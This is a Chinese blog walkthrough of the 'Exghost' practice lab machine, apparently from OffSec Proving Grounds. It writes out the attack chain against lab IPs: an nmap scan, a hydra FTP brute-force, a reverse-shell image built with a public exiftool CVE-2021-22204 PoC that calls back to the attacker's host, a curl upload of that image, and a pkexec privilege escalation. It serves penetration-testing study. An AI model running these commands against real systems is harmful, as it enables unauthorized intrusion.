Exghost ftp爆破 curl上传

01237

简介

point 20

Sybaris

Difficulty Easy

rated by community HARD

 

实验环境

攻击者 Kali 192.168.45.197

受害者 IP 192.168.171.183  Linux

 

1. 信息收集

收集受害者服务详情

nmap -sV -A 192.168.171.183

20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.41

 

ftp尝试用anonymous登录 无效

 

尝试80端口服务

2024-05-02_21-12

尝试gobuster爆破

2024-05-02_21-121

访问 同样是Forbidden

 

2. 漏洞挖掘与利用

没办法了

尝试爆破ftp

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.171.183 ftp

2024-05-02_21-15

ok 爆破出来一组

 

登录ftp

2024-05-02_21-16

 

发现是一个抓包结果文件

找到了exiftool版本

2024-05-02_21-17

 

找到了一个上传页面 和已经上传的文件

2024-05-02_21-18

 

经过google 找到exiftool的版本POC

https://github.com/AssassinUKG/CVE-2021-22204?tab=readme-ov-file

 

运行POC 生成反弹shell 更新一个现有图片

bash CVE-2021-22204.sh "reverseme 192.168.45.197 4444" image.jpg

kali先监听4444端口

 

上传到exiftest.php

模仿上图的名字

curl -F myFile=@image.jpg http://192.168.171.183/exiftest.php

直接拿到shell

 

3. 权限提升

在linpeas中

2024-05-02_21-26

sudo version 1.8.31

POC在这

https://github.com/joeammond/CVE-2021-4034

 

运行直接提权成功

2024-05-02_21-27

 

 

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Offensive Security PG Practise
喜欢就支持一下吧
点赞7 分享
zhyann的头像-白鸢的笔记钻石会员
Active Directory Introduction and Enumeration 2-白鸢的笔记
Active Directory Introduction and Enumeration 2
Active Directory Introduction and Enumeration 2
1年前 182
winPEAS使用 利用有缺陷的注册表权限提权-白鸢的笔记
winPEAS使用 利用有缺陷的注册表权限提权
winPEAS使用 利用有缺陷的注册表权限提权
1年前 150
使用自动化脚本实现Linux信息收集工作-白鸢的笔记
使用自动化脚本实现Linux信息收集工作
使用自动化脚本实现Linux信息收集工作
2年前 138
NTLM认证-白鸢的笔记
NTLM认证
NTLM认证
11个月前 133
判断语句的嵌套-白鸢的笔记
判断语句的嵌套
判断语句的嵌套
2年前 118
TryHackMe Windows PrivESC-白鸢的笔记
TryHackMe Windows PrivESC
TryHackMe Windows PrivESC
10个月前 103
相关推荐
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
Exfiltrated-白鸢的笔记
Exfiltrated
Exfiltrated
1年前 92
Flimsy-白鸢的笔记
Flimsy
Flimsy
1年前 91
LaVita-白鸢的笔记
LaVita
LaVita
1年前 85
Jacko-白鸢的笔记
Jacko
Jacko
1年前 83
DepthB2R SSH远程代码执行-白鸢的笔记
DepthB2R SSH远程代码执行
DepthB2R SSH远程代码执行
1年前 76
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片